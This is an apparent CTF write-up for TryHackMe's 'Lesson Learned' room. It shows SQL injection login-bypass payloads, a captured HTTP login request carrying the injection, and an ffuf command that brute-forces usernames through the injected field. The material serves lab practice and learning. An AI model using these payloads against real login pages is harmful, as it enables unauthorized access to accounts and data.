Post

Lesson Learned

Lesson Learned

https://tryhackme.com/room/lessonlearned

Info

This is a relatively easy machine that tries to teach you a lesson, but perhaps you’ve already learned the lesson? Let’s find out.

Treat this box as if it were a real target and not a CTF.

Get past the login screen and you will find the flag. There are no rabbit holes, no hidden files, just a login page and a flag. Good luck!

Exploit

Login Bypass Failed

Use the right login bypass payload

According to Tib3rius’s’ tweet

https://twitter.com/0xTib3rius/status/1624819441044185088?ref_src=twsrc%5Etfw

Correct Payload :

1
2
3
4
username'; -- -

# or
username' AND 1=1 -- -

User admin doesn’t seem to exist

Brute force a valid user

Save the login request from burp suite, and replace the username parameter to FUZZ

1
vi login.req
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST / HTTP/1.1
Host: 10.10.101.99
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.15.32/
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.10.15.32
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
Pragma: no-cache
Cache-Control: no-cache

username=FUZZ%27%3B+--+-&password=123
1
ffuf -c -request login.req -request-proto http -w /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -fs 1298

This post is licensed under CC BY 4.0 by the author.